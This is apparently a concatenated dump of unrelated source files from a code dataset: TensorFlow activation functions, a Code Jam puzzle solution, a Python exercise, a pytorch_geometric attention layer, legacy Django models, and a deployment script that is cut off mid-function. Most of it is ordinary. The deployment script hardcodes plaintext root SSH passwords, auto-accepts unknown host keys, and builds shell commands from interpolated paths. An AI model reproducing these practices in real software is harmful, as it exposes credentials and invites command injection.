""" Hyperbolic tangent (tanh) function.
The element-wise hyperbolic tangent function is essentially a rescaled
sigmoid function. The sigmoid function with range $[0,1]$ is defined as follows:
$$
f(x) = \\frac{1}{1 + \\exp(-x)}
$$
    the hyperbolic tangent is a re-scaled function whose outputs range over $[-1,1]$, defined as:
$$
tanh(x) = 2f(2x)−1
$$
which leads us to the standard definition of hyperbolic tangent
$$
tanh(x)=\\frac{e^{x}-e^{-x}}{e^{x}+e^{-x}}
$$
Args:
x (`Tensor`): an input tensor
Returns:
tensor (`Tensor`): a tensor with the result of applying the element-wise hyperbolic tangent to the input
"""
return tf.nn.tanh(x)
def relu(x):
""" relu activation
    A rectified linear unit [1] is defined as:
$$
f(x)= \\max(0, x)
$$
!!! cite "References"
1. (Vinod & Hinton, 2010) [Rectified linear units improve restricted boltzmann machines](https://www.cs.toronto.edu/~fritz/absps/reluICML.pdf)
Args:
x (`Tensor`): input tensor
Returns:
tensor (`Tensor`) that results in element-wise rectifier applied to x.
"""
return tf.nn.relu(x)
def elu(x, alpha=1.0):
""" elu activation
An Exponential Linear Unit (ELU) is defined as:
$$
f(x)=\\left\\{\\begin{array}{cc}x & x>0 \\\\
\\alpha \\cdot \\left(e^{x}-1\\right) & x<=0
\\end{array}\\right\\}
$$
!!! cite "References"
1. (Clevert et al. 2015) [Fast and accurate deep network learning by exponential linear units (ELUs)](https://arxiv.org/abs/1511.07289).
Args:
x (`Tensor`): an input tensor
alpha (`float`): A scalar, slope of positive section.
Returns:
tensor (`Tensor`): resulting from the application of the elu activation to the input tensor.
"""
y = tf.nn.elu(x)
if alpha == 1:
return y
else:
        return tf.where(x > 0, y, alpha * y)  # scale only the negative branch by alpha
def gelu(x, approximate: bool = True) -> tf.Tensor:
""" Gaussian Error Linear Unit.
    Computes the Gaussian error linear unit:
`0.5 * x * (1 + tanh(sqrt(2 / pi) * (x + 0.044715 * x^3)))` or
`x * P(X <= x) = 0.5 * x * (1 + erf(x / sqrt(2)))`, where P(X) ~ N(0, 1),
depending on whether approximation is enabled.
!!! cite "References"
1. [Gaussian Error Linear Units (GELUs)](https://arxiv.org/abs/1606.08415)
2. [BERT](https://arxiv.org/abs/1810.04805).
Args:
x (`Tensor`): Must be one of the following types:
`float16`, `float32`, `float64`.
approximate (bool): whether to enable approximation.
Returns:
tensor (`Tensor`): with the same type as `x`
"""
x = tf.convert_to_tensor(x)
if approximate:
pi = tf.cast(tf.constant(math.pi), x.dtype)
coefficient = tf.cast(0.044715, x.dtype)
return 0.5 * x * (1.0 + tf.tanh(tf.sqrt(2.0 / pi) * (x + coefficient * tf.pow(x, 3))))
else:
return 0.5 * x * (1.0 + tf.math.erf(x / tf.cast(tf.sqrt(2.0), x.dtype)))
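# Note: GELU(x) = x * Phi(x) with Phi the standard-normal CDF; the erf branch is
# exact, while the tanh branch is the fast Hendrycks & Gimpel approximation.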
def selu(x):
""" The Scaled Exponential Linear Unit (SELU)
`scale * x` if `x > 0` and `scale * alpha * (exp(x) - 1)` if `x < 0`
where alpha and scale are pre-defined constants (`alpha = 1.67326324` and `scale = 1.05070098`).
The values of alpha and scale are chosen so that the mean and variance of the inputs are preserved
between two consecutive layers as long as the weights are initialized correctly
(see `variance_scaling_init`).
To be used together with initializer = tf.variance_scaling_initializer(factor=1.0, mode='FAN_IN').
For correct dropout, use tf.contrib.nn.alpha_dropout.
!!! cite "References"
1. [Self-Normalizing Neural Networks](https://arxiv.org/pdf/1706.02515.pdf)
Args:
x (`Tensor`): input tensor
Returns:
tensor (`Tensor`): results in `scale * x` if `x > 0` and `scale * alpha * (exp(x) - 1)` if `x < 0`
"""
return tf.nn.selu(x)
def softmax(x, axis=None, name=None):
""" softmax activation
    The softmax activation function is equivalent to `softmax = tf.exp(logits) / tf.reduce_sum(tf.exp(logits), axis)`
    and is defined as:
$$
\\sigma(\\mathbf{z})_{i}=\\frac{e^{z_{i}}}{\\sum_{j=1}^{K} e^{z_{j}}}
$$
Args:
x (`Tensor`): input tensor
axis (`int`): the dimension softmax would be performed on. The default is -1 which indicates the last dimension.
name (`str`): name for this op
Returns:
tensor (`Tensor`): output resulting from the application of the softmax function to the input tensor
"""
return tf.nn.softmax(x, axis=axis, name=name)
def sparsemax(logits, name: str = None) -> tf.Tensor:
"""Computes the sparsemax activation function [1]
For each batch `i` and class `j` we have
sparsemax[i, j] = max(logits[i, j] - tau(logits[i, :]), 0)
References:
[1]: https://arxiv.org/abs/1602.02068
Args:
logits (`Tensor`): tensor with dtype: `half`, `float32`,`float64`.
name (`str`): A name for the operation (optional).
Returns:
tensor (`Tensor`): with the same type as the input logits.
"""
with tf.name_scope(name, "sparsemax"):
logits = tf.convert_to_tensor(logits, name="logits")
obs = tf.shape(logits)[0]
dims = tf.shape(logits)[1]
z = logits - tf.reduce_mean(logits, axis=1)[:, tf.newaxis]
# sort z
z_sorted, _ = tf.nn.top_k(z, k=dims)
# calculate k(z)
z_cumsum = tf.cumsum(z_sorted, axis=1)
k = tf.range(
1, tf.cast(dims, logits.dtype) + 1, dtype=logits.dtype)
z_check = 1 + k * z_sorted > z_cumsum
# because the z_check vector is always [1,1,...1,0,0,...0] finding the
# (index + 1) of the last `1` is the same as just summing the number of 1.
k_z = tf.reduce_sum(tf.cast(z_check, tf.int32), axis=1)
# calculate tau(z)
indices = tf.stack([tf.range(0, obs), k_z - 1], axis=1)
tau_sum = tf.gather_nd(z_cumsum, indices)
tau_z = (tau_sum - 1) / tf.cast(k_z, logits.dtype)
# calculate p
return tf.maximum(
tf.cast(0, logits.dtype), z - tau_z[:, tf.newaxis])
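# e.g. sparsemax([[0.1, 1.1, 0.2]]) ~ [[0., 0.95, 0.05]]: unlike softmax, small
# logits can receive exactly zero probability.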
__all__ = [
"identity",
"sigmoid",
"hard_sigmoid",
"tanh",
"relu",
"selu",
"elu",
"gelu",
"softmax",
"sparsemax"
]
| [
"[email protected]"
] | |
30fee447c48fbadf60c4992516d343c3172117ad | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_135/1920.py | 90cfffa52cf142046f944f67dd669ef10263e345 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 617 | py | import sys
cases = int(sys.stdin.readline())
for i in range(1,cases+1):
r1 = int(sys.stdin.readline())
board1 = []
for j in range(4):
board1.append(set(sys.stdin.readline().strip().split()))
r2 = int(sys.stdin.readline())
board2 = []
for j in range(4):
board2.append(set(sys.stdin.readline().strip().split()))
solutions = board1[r1-1] & board2[r2-1]
if len(solutions) == 0:
print("Case #%s: Volunteer cheated!" % i)
elif len(solutions) == 1:
print("Case #%s: %s" % ( i, solutions.pop() ))
else:
print("Case #%s: Bad magician!" % i)
| [
"[email protected]"
] | |
6edd0b38fb67914d917cc619077312985109a170 | 94eed60e05689e25f9070e80ad7e4fc3092d9df4 | /Languages/Python/python_study_3/page10/script.py | 8fdc9c00a26f834116e701e6e8cdaaafd65dbe91 | [
"MIT"
] | permissive | myarist/Progate | 0998e79f786db7a93ebd7488494427c3156729c7 | 0132583c989b5ec1805d4de1a6f6861586cf152e | refs/heads/main | 2023-05-09T05:52:12.476226 | 2021-06-07T21:26:48 | 2021-06-07T21:26:48 | 363,348,949 | 13 | 17 | null | null | null | null | UTF-8 | Python | false | false | 734 | py | def validate(hand):
if hand < 0 or hand > 2:
return False
return True
def print_hand(hand, name='Guest'):
    hands = ['Rock', 'Paper', 'Scissors']
    print(name + ' chose: ' + hands[hand])
print('Starting a game of Rock Paper Scissors!')
player_name = input('Enter your name: ')
print('Choose a hand: (0: Rock, 1: Paper, 2: Scissors)')
player_hand = int(input('Enter a number (0-2): '))
if validate(player_hand):
    # Assign 1 to the variable computer_hand
    computer_hand = 1
    print_hand(player_hand, player_name)
    # Call the print_hand function with computer_hand and 'Computer' as arguments
    print_hand(computer_hand, 'Computer')
else:
    print('Please enter a valid number')
| [
"[email protected]"
] | |
1505ecdc491bd9721b4650ce6eda55cdbee0446a | fdefd1f4b402620d7a9cc1f5ca8ed522c54bec4a | /torch_geometric/nn/conv/dna_conv.py | 2b90319e7c9fa0d0e6415824ba077d9d74642c10 | [
"MIT"
] | permissive | Lotayou/pytorch_geometric | 75f9ee187503fed9b70a800e5d768ecb91719d9f | 09ef8e3a510de3336f092a5dc1ede290b1c5cdb8 | refs/heads/master | 2020-05-07T22:24:52.701826 | 2019-04-12T05:24:52 | 2019-04-12T05:24:52 | 174,668,900 | 1 | 0 | MIT | 2019-03-09T08:36:42 | 2019-03-09T08:36:41 | null | UTF-8 | Python | false | false | 9,892 | py | from __future__ import division
import math
import torch
from torch import Tensor
from torch.nn import Parameter
import torch.nn.functional as F
from torch_geometric.nn.conv import MessagePassing, GCNConv
from ..inits import uniform, kaiming_uniform
class Linear(torch.nn.Module):
def __init__(self, in_channels, out_channels, groups=1, bias=True):
super(Linear, self).__init__()
assert in_channels % groups == 0 and out_channels % groups == 0
self.in_channels = in_channels
self.out_channels = out_channels
self.groups = groups
self.weight = Parameter(
Tensor(groups, in_channels // groups, out_channels // groups))
if bias:
self.bias = Parameter(torch.Tensor(out_channels))
else:
self.register_parameter('bias', None)
self.reset_parameters()
def reset_parameters(self):
kaiming_uniform(self.weight, fan=self.weight.size(1), a=math.sqrt(5))
uniform(self.weight.size(1), self.bias)
def forward(self, src):
# Input: [*, in_channels]
# Output: [*, out_channels]
if self.groups > 1:
size = list(src.size())[:-1]
src = src.view(-1, self.groups, self.in_channels // self.groups)
src = src.transpose(0, 1).contiguous()
out = torch.matmul(src, self.weight)
out = out.transpose(1, 0).contiguous()
out = out.view(*size, self.out_channels)
else:
out = torch.matmul(src, self.weight.squeeze(0))
if self.bias is not None:
out += self.bias
return out
def __repr__(self): # pragma: no cover
return '{}({}, {}, groups={}, bias={})'.format(
self.__class__.__name__, self.in_channels, self.out_channels,
self.groups, self.bias is not None)
def restricted_softmax(src, dim=-1, margin=0):
src_max = torch.clamp(src.max(dim=dim, keepdim=True)[0], min=0)
out = (src - src_max).exp()
out = out / (out.sum(dim=dim, keepdim=True) + (margin - src_max).exp())
return out
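# Note: the extra exp(margin - src_max) term acts like an implicit logit fixed
# at `margin`, so the outputs may sum to less than one (attention can abstain).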
class Attention(torch.nn.Module):
def __init__(self, dropout=0):
super(Attention, self).__init__()
self.dropout = dropout
def forward(self, query, key, value):
# Query: [*, query_entries, dim_k]
# Key: [*, key_entries, dim_k]
# Value: [*, key_entries, dim_v]
# Output: [*, query_entries, dim_v]
assert query.dim() == key.dim() == value.dim() >= 2
assert query.size(-1) == key.size(-1)
assert key.size(-2) == value.size(-2)
# Score: [*, query_entries, key_entries]
score = torch.matmul(query, key.transpose(-2, -1))
score = score / math.sqrt(key.size(-1))
score = restricted_softmax(score, dim=-1)
if self.dropout > 0:
score = F.dropout(score, p=self.dropout, training=self.training)
return torch.matmul(score, value)
def __repr__(self): # pragma: no cover
return '{}(dropout={})'.format(self.__class__.__name__, self.dropout)
class MultiHead(Attention):
def __init__(self,
in_channels,
out_channels,
heads=1,
groups=1,
dropout=0,
bias=True):
super(MultiHead, self).__init__(dropout)
self.in_channels = in_channels
self.out_channels = out_channels
self.heads = heads
self.groups = groups
self.bias = bias
assert in_channels % heads == 0 and out_channels % heads == 0
assert in_channels % groups == 0 and out_channels % groups == 0
assert max(groups, self.heads) % min(groups, self.heads) == 0
self.lin_q = Linear(in_channels, out_channels, groups, bias)
self.lin_k = Linear(in_channels, out_channels, groups, bias)
self.lin_v = Linear(in_channels, out_channels, groups, bias)
self.reset_parameters()
def reset_parameters(self):
self.lin_q.reset_parameters()
self.lin_k.reset_parameters()
self.lin_v.reset_parameters()
def forward(self, query, key, value):
# Query: [*, query_entries, in_channels]
# Key: [*, key_entries, in_channels]
# Value: [*, key_entries, in_channels]
# Output: [*, query_entries, out_channels]
assert query.dim() == key.dim() == value.dim() >= 2
assert query.size(-1) == key.size(-1) == value.size(-1)
assert key.size(-2) == value.size(-2)
query = self.lin_q(query)
key = self.lin_k(key)
value = self.lin_v(value)
# Query: [*, heads, query_entries, out_channels // heads]
# Key: [*, heads, key_entries, out_channels // heads]
# Value: [*, heads, key_entries, out_channels // heads]
size = list(query.size())[:-2]
out_channels_per_head = self.out_channels // self.heads
query = query.view(*size, query.size(-2), self.heads,
out_channels_per_head).transpose(-2, -3)
key = key.view(*size, key.size(-2), self.heads,
out_channels_per_head).transpose(-2, -3)
value = value.view(*size, value.size(-2), self.heads,
out_channels_per_head).transpose(-2, -3)
# Output: [*, heads, query_entries, out_channels // heads]
out = super(MultiHead, self).forward(query, key, value)
# Output: [*, query_entries, heads, out_channels // heads]
out = out.transpose(-3, -2).contiguous()
# Output: [*, query_entries, out_channels]
out = out.view(*size, query.size(-2), self.out_channels)
return out
def __repr__(self): # pragma: no cover
return '{}({}, {}, heads={}, groups={}, dropout={}, bias={})'.format(
self.__class__.__name__, self.in_channels, self.out_channels,
self.heads, self.groups, self.dropout, self.bias)
class DNAConv(MessagePassing):
r"""The dynamic neighborhood aggregation operator from the `"Just Jump:
Towards Dynamic Neighborhood Aggregation in Graph Neural Networks"
<https://arxiv.org/abs/1904.04849>`_ paper
.. math::
\mathbf{x}_v^{(t)} = h_{\mathbf{\Theta}}^{(t)} \left( \mathbf{x}_{v
\leftarrow v}^{(t)}, \left\{ \mathbf{x}_{v \leftarrow w}^{(t)} : w \in
\mathcal{N}(v) \right\} \right)
based on (multi-head) dot-product attention
.. math::
\mathbf{x}_{v \leftarrow w}^{(t)} = \textrm{Attention} \left(
\mathbf{x}^{(t-1)}_v \, \mathbf{\Theta}_Q^{(t)}, [\mathbf{x}_w^{(1)},
        \ldots, \mathbf{x}_w^{(t-1)}] \, \mathbf{\Theta}_K^{(t)}, \,
        [\mathbf{x}_w^{(1)}, \ldots, \mathbf{x}_w^{(t-1)}] \,
        \mathbf{\Theta}_V^{(t)} \right)
with :math:`\mathbf{\Theta}_Q^{(t)}, \mathbf{\Theta}_K^{(t)},
\mathbf{\Theta}_V^{(t)}` denoting (grouped) projection matrices for query,
key and value information, respectively.
:math:`h^{(t)}_{\mathbf{\Theta}}` is implemented as a non-trainable
version of :class:`torch_geometric.nn.conv.GCNConv`.
.. note::
In contrast to other layers, this operator expects node features as
shape :obj:`[num_nodes, num_layers, channels]`.
Args:
channels (int): Size of each input/output sample.
heads (int, optional): Number of multi-head-attentions.
(default: :obj:`1`)
groups (int, optional): Number of groups to use for all linear
projections. (default: :obj:`1`)
dropout (float, optional): Dropout probability of attention
coefficients. (default: :obj:`0`)
cached (bool, optional): If set to :obj:`True`, the layer will cache
the computation of :math:`{\left(\mathbf{\hat{D}}^{-1/2}
\mathbf{\hat{A}} \mathbf{\hat{D}}^{-1/2} \right)}`.
(default: :obj:`False`)
bias (bool, optional): If set to :obj:`False`, the layer will not learn
an additive bias. (default: :obj:`True`)
"""
def __init__(self,
channels,
heads=1,
groups=1,
dropout=0,
cached=False,
bias=True):
super(DNAConv, self).__init__('add')
self.bias = bias
self.cached = cached
self.cached_result = None
self.multi_head = MultiHead(channels, channels, heads, groups, dropout,
bias)
self.reset_parameters()
def reset_parameters(self):
self.multi_head.reset_parameters()
self.cached_result = None
def forward(self, x, edge_index, edge_weight=None):
""""""
# X: [num_nodes, num_layers, channels]
# Edge Index: [2, num_edges]
# Edge Weight: [num_edges]
if x.dim() != 3:
raise ValueError('Feature shape must be [num_nodes, num_layers, '
'channels].')
num_nodes, num_layers, channels = x.size()
if not self.cached or self.cached_result is None:
edge_index, norm = GCNConv.norm(
edge_index, x.size(0), edge_weight, dtype=x.dtype)
self.cached_result = edge_index, norm
edge_index, norm = self.cached_result
return self.propagate(edge_index, x=x, norm=norm)
def message(self, x_i, x_j, norm):
# X_i: [num_edges, num_layers, channels]
# X_j: [num_edges, num_layers, channels]
# Norm: [num_edges]
# Output: [num_edges, channels]
x_i = x_i[:, -1:] # [num_edges, 1, channels]
out = self.multi_head(x_i, x_j, x_j) # [num_edges, 1, channels]
return norm.view(-1, 1) * out.squeeze(1)
def __repr__(self):
return '{}({}, heads={}, groups={})'.format(
self.__class__.__name__, self.multi_head.in_channels,
self.multi_head.heads, self.multi_head.groups)
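# Minimal usage sketch (hypothetical shapes; `channels` must match the input):
#   conv = DNAConv(channels=64, heads=4, groups=8)
#   x = torch.randn(num_nodes, num_layers, 64)  # stacked per-layer features
#   out = conv(x, edge_index)                   # -> [num_nodes, 64]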
| [
"[email protected]"
] | |
fa5290467644a2b4bf1c09544db265e9187a3b94 | 6293491133e816f6148d576639f21348f8f19297 | /main/models/legacy.py | dd4cf540dfae6daf01225a5085e3e09b1ce6366c | [
"MIT"
] | permissive | BAMRU-Tech/bamru_net | 0f6539973fb4eb088d76f50f491c2c1b74edd35b | b988b6e41c786448c4a8a76c11397d195f802a26 | refs/heads/main | 2023-07-24T14:09:59.712325 | 2023-07-11T06:37:07 | 2023-07-11T06:37:07 | 149,375,227 | 7 | 3 | MIT | 2023-07-11T06:39:00 | 2018-09-19T01:38:59 | Python | UTF-8 | Python | false | false | 5,554 | py |
from django.db import models  # required by the model definitions below

#####################################################################
# Models below this line have not been looked at
#####################################################################
class DataFiles(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
member_id = models.IntegerField(blank=True, null=True)
download_count = models.IntegerField(blank=True, null=True)
data_file_extension = models.TextField(blank=True, null=True) # This field type is a guess.
data_file_name = models.TextField(blank=True, null=True) # This field type is a guess.
data_file_size = models.TextField(blank=True, null=True) # This field type is a guess.
data_content_type = models.TextField(blank=True, null=True) # This field type is a guess.
data_updated_at = models.TextField(blank=True, null=True) # This field type is a guess.
created_at = models.DateTimeField(blank=True, null=True)
updated_at = models.DateTimeField(blank=True, null=True)
killme1 = models.IntegerField(blank=True, null=True)
killme2 = models.IntegerField(blank=True, null=True)
caption = models.TextField(blank=True, null=True) # This field type is a guess.
published = models.NullBooleanField()
class DataLinks(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
member_id = models.IntegerField(blank=True, null=True)
site_url = models.TextField(blank=True, null=True) # This field type is a guess.
caption = models.TextField(blank=True, null=True) # This field type is a guess.
published = models.NullBooleanField()
link_backup_file_name = models.TextField(blank=True, null=True) # This field type is a guess.
link_backup_content_type = models.TextField(blank=True, null=True) # This field type is a guess.
link_backup_file_size = models.IntegerField(blank=True, null=True)
link_backup_updated_at = models.IntegerField(blank=True, null=True)
position = models.IntegerField(blank=True, null=True)
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
class DataPhotos(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
member_id = models.IntegerField(blank=True, null=True)
caption = models.TextField(blank=True, null=True) # This field type is a guess.
image_file_name = models.TextField(blank=True, null=True) # This field type is a guess.
image_content_type = models.TextField(blank=True, null=True) # This field type is a guess.
image_file_size = models.IntegerField(blank=True, null=True)
image_updated_at = models.IntegerField(blank=True, null=True)
position = models.IntegerField(blank=True, null=True)
published = models.NullBooleanField()
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
class EventFiles(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
event_id = models.IntegerField(blank=True, null=True)
data_file_id = models.IntegerField(blank=True, null=True)
keyval = models.TextField(blank=True, null=True)
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
class EventLinks(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
event_id = models.IntegerField(blank=True, null=True)
data_link_id = models.IntegerField(blank=True, null=True)
keyval = models.TextField(blank=True, null=True)
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
class EventPhotos(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
event_id = models.IntegerField(blank=True, null=True)
data_photo_id = models.IntegerField(blank=True, null=True)
keyval = models.TextField(blank=True, null=True)
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
class EventReports(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
typ = models.TextField(blank=True, null=True) # This field type is a guess.
member_id = models.IntegerField(blank=True, null=True)
event_id = models.IntegerField(blank=True, null=True)
period_id = models.IntegerField(blank=True, null=True)
title = models.TextField(blank=True, null=True) # This field type is a guess.
data = models.TextField(blank=True, null=True)
position = models.IntegerField(blank=True, null=True)
published = models.NullBooleanField()
created_at = models.DateTimeField()
updated_at = models.DateTimeField()
################ Old messaging ###########################
class Rsvps(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
message_id = models.IntegerField(blank=True, null=True)
prompt = models.TextField(blank=True, null=True) # This field type is a guess.
yes_prompt = models.TextField(blank=True, null=True) # This field type is a guess.
no_prompt = models.TextField(blank=True, null=True) # This field type is a guess.
created_at = models.DateTimeField(blank=True, null=True)
updated_at = models.DateTimeField(blank=True, null=True)
class Journals(models.Model):
id = models.IntegerField(primary_key=True) # AutoField?
member_id = models.IntegerField(blank=True, null=True)
distribution_id = models.IntegerField(blank=True, null=True)
action = models.TextField(blank=True, null=True) # This field type is a guess.
created_at = models.DateTimeField(blank=True, null=True)
updated_at = models.DateTimeField(blank=True, null=True)
| [
"[email protected]"
] | |
5e9e628a0571d892088ff32b1a6315611dcec60e | 5ab78eb2f4f17337f9e8b6a90e588aaba6af4a90 | /work/auto_make_iso.py | 685dc4c8924bfea5ff8431c946d8ec46dd276f11 | [] | no_license | swl5571147a/stone | 3946dbdba2315bb9f75495a1efcbe713e4c72324 | d75538601e992fec000adf0550f9ac54fa326e18 | refs/heads/master | 2021-01-21T00:20:55.272706 | 2014-05-26T15:41:16 | 2014-05-26T15:41:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,701 | py | #!/usr/bin/env python
import paramiko,os,sys,commands,time
from subprocess import Popen, PIPE
import shlex
#set the default configure and argvs
current_time = time.strftime('%Y-%m-%d-%H-%M-%S',time.localtime(time.time()))
conf = {'path_mcu':'/home/broad/sunwenlong/iserver-mcu/medooze',
'path_mcuWeb':'',
'path_siremis':'/home/broad/sunwenlong/iserver-sipserver',
'path_source':'/home/broad/sunwenlong/source',
'port':22,
'remote_ip':'192.168.1.100',
'root':'broadeng',
'broad':'broad123',
'path_sql':'/home/broad/sunwenlong/iserver-sipserver/config'
}
def ssh_get_source(remote_ip,port,user,passwd):
    '''set the ssh-connect for getting the source'''
ssh = paramiko.SSHClient()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
ssh.connect(remote_ip,port,user,passwd)
return ssh
def ssh_down_load(remote_ip,port,user,passwd):
    '''set the ssh-connect for downloading the tar_source'''
ssh = paramiko.Transport((remote_ip,port))
ssh.connect(username=user,password=passwd)
return ssh
def git_update_tar(ssh,path,file_name):
'''To update the git from gitserver and tar the target dir to filename-current_time.tar.gz'''
cmd = 'cd %s && git pull && tar zcvf %s-%s.tar.gz %s'%(path,file_name,current_time, file_name)
    try:
        stdin,stdout,stderr = ssh.exec_command(cmd)
        err = stderr.read()  # read once; a second read() returns an empty string
        print '%s backup OK'%file_name
        if err:
            print err
    except:
        print 'Error! %s backup error'%file_name
    ssh.close()
def scp_source(ssh,path,file_name):
    '''Download the tar file from the source host'''
sftp = paramiko.SFTPClient.from_transport(ssh)
remote_path = '%s/%s-%s.tar.gz'%(path,file_name,current_time)
local_path = '%s/%s-%s.tar.gz'%(conf['path_source'],file_name,current_time)
try:
s = sftp.get(remote_path,local_path)
        print 'OK! %s downloaded successfully!'%file_name
except:
print 'Error! %s could not download!'%file_name
ssh.close()
def clean_source(ssh,path,file_name):
'''To clean the tar file in the source dir'''
cmd = 'rm -f %s/%s-%s.tar.gz'%(path,file_name,current_time)
stdin,stdout,stderr = ssh.exec_command(cmd)
if not stderr.readlines():
print '%s-%s.tar.gz clean up from remote'%(file_name,current_time)
else:
print 'Error! %s-%s.tar.gz clean up error'%(file_name,current_time)
def tar_zxvf(file_name):
'''To tar zxvf the tar_file_name '''
dir_path = os.path.join(conf['path_source'], file_name)
err_rm = clean_old_dir(dir_path)
print_err(err_rm)
    tar_path = os.path.join(conf['path_source'], '%s-%s.tar.gz' % (file_name, current_time))
tar_file = '%s-%s.tar.gz'%(file_name,current_time)
tar_cmd = 'cd %s && tar zxvf %s'%(conf['path_source'], tar_file)
if os.path.exists(tar_path):
try:
subf_tar = Popen(tar_cmd, stdout=PIPE, stderr=PIPE, shell=True)
err_tar = subf_tar.stderr.read()
if not err_tar:
print 'tar zxvf %s is OK!'%tar_file
except:
            err_tar = 'Error! The command tar zxvf %s could not be done! Please check it!'%(tar_file)
    else:
        err_tar = ''
        print 'Error! The file %s does not exist! Please check it in dir: %s'%(file_name, conf['path_source'])
    print_err(err_tar)
def mcu_make():
'''To make the new mcu and replace the old mcu'''
make_path = os.path.join(conf['path_source'], 'mcu')
    print 'It will take some minutes, please wait ......'
if not os.path.exists(make_path):
        print 'Error! The dir mcu could not be found! Please check it in dir: /home/broad/sunwenlong/source'
else:
make_cmd = 'cd %s && sudo make'%make_path
try:
subf = Popen(make_cmd, stdout=PIPE, stderr=PIPE, shell=True)
err_make = subf.stderr.read()
if not err_make:
print 'make mcu OK!'
except:
            err_make = 'Error! The mcu_make_cmd could not be done!'
print_err(err_make)
make_mcu_path = os.path.join(make_path, 'bin/release')
new_mcu = os.path.join(make_mcu_path, 'mcu')
old_mcu_path = '/usr/local/bin'
old_mcu = '/usr/local/bin/mcu'
if os.path.exists(new_mcu):
rm_cmd = 'rm -f %s'%old_mcu
cp_cmd = 'cp %s %s'%(new_mcu, old_mcu_path)
try:
subf_rm = Popen(rm_cmd, stdout=PIPE, stderr=PIPE, shell=True)
subf_cp = Popen(cp_cmd, stdout=PIPE, stderr=PIPE, shell=True)
err_rm = subf_rm.stderr.read()
err_cp = subf_cp.stderr.read()
if not err_rm:
print 'OK! The command of remove the old mcu is OK!'
if not err_cp:
print 'OK! Copy the new mcu to /usr/local/bin is OK!'
except:
                err_rm = 'Error! The command of removing the old mcu could not be done! Please check it!'
                err_cp = 'Error! The command of copying the new mcu to /usr/local/bin could not be done! Please check it!'
        else:
            err_rm = err_cp = ''
            print 'Warning! The target file mcu does not exist, please check it!'
print_err(err_rm)
print_err(err_cp)
def restart_service(target_service):
'''To restart the service of target_service'''
re_cmd = ['service', target_service, 'restart']
try:
subf_re = Popen(re_cmd, stdout=PIPE, stderr=PIPE)
err_re = subf_re.stderr.read()
if not err_re:
print 'OK! The command of restart the service %s is OK!'%target_service
except:
        err_re = 'Error! The command of restarting the service %s could not be done!'%target_service
print_err(err_re)
def print_err(s):
'''To print the error if there is error'''
if s:
for i in s.split('\n'):
print i
def clean_old_dir(dir_path):
'''To clean the old dir for the new dir using'''
if os.path.exists(dir_path):
cmd = ['rm', '-rf', dir_path]
try:
subf = Popen(cmd, stdout=PIPE, stderr=PIPE)
err = subf.stderr.read()
except:
            err = 'Error! The command of cleaning the old dir %s could not be done! Please check it!'%dir_path
return err
def replace_siremis(dir_name):
'''To remove the old siremis dir, and copy the new dir of siremis to /var/www'''
#remove the old siremis dir
dir_path = os.path.join('/var/www', dir_name)
if os.path.exists(dir_path):
rm_cmd = ['rm', '-rf', dir_path]
try:
subf_rm = Popen(rm_cmd, stdout=PIPE, stderr=PIPE)
err_rm = subf_rm.stderr.read()
if not err_rm:
print 'OK! The command of remove the dir : %s is OK!'%dir_name
except:
            err_rm = 'Error! The command of removing the dir %s could not be done! Please check it!'%dir_name
print_err(err_rm)
#to cp the new siremis to /var/www
src_path = os.path.join(conf['path_source'], dir_name)
cp_cmd = ['cp', '-r', src_path, '/var/www']
try:
subf_cp = Popen(cp_cmd, stdout=PIPE, stderr=PIPE)
err_cp = subf_cp.stderr.read()
if not err_cp:
print 'OK! The command of copy the dir : %s to /var/www is OK!'%dir_name
except:
        err_cp = 'Error! The command of copying the dir %s to /var/www could not be done! Please check it!'%dir_name
print_err(err_cp)
#to chown the owner of the dir siremis
if os.path.exists(dir_path):
ch_cmd = ['chown','-R', 'www-data:www-data', dir_path]
try:
subf_ch = Popen(ch_cmd, stdout=PIPE, stderr=PIPE)
err_ch = subf_ch.stderr.read()
if not err_ch:
print 'OK! The command of chown the %s to www-data is OK!'%dir_name
except:
            err_ch = 'Error! The command of chowning %s to www-data could not be done! Please check it!'%dir_name
print_err(err_ch)
def purge_kernel(kernel):
'''purge kernel 3.9.5 and 3.11.6'''
cmd = ['apt-get','purge',kernel]
try:
subf = Popen(cmd,stderr=PIPE)
err = subf.stderr.read()
except:
        err = 'Error! The command of purging %s could not be done!'%kernel
if err:
print err
def remove_rubbish(path):
'''remove rubbish'''
cmd = 'rm -Rf %s' %path
try:
subf = Popen(cmd,stderr=PIPE,shell=True)
err = subf.stderr.read()
except:
        err = 'Error! The command of removing %s could not be done!'%path
if err:
print err
def get_file_md5(file_path):
'''Get the file md5'''
    md5_value = ''  # default when the file is missing or md5sum produced no output
    if os.path.exists(file_path):
cmd = ['md5sum',file_path]
try:
subf = Popen(cmd,stderr=PIPE,stdout=PIPE)
data = subf.stdout.read()
err = subf.stderr.read()
except:
data = ''
err = 'Error! The command of md5sum %s could not be done!'%file_path
if err:
print err
if data:
md5_value = data.split()[0].strip()
else:
print 'Warning! Could not get the %s md5 value!'%file_path
else:
        print 'Warning! The file %s does not exist!'%file_path
return md5_value
def update_sql(db_name,sql_bak_name):
'''update the mysql table'''
md5_file = '%s/md5.txt'%conf['path_source']
if os.path.exists(md5_file):
with open(md5_file,'r') as fp:
old_md5 = fp.read().strip()
else:
old_md5 = ''
ssh = ssh_down_load(conf['remote_ip'],conf['port'],'root',conf['root'])
sftp = paramiko.SFTPClient.from_transport(ssh)
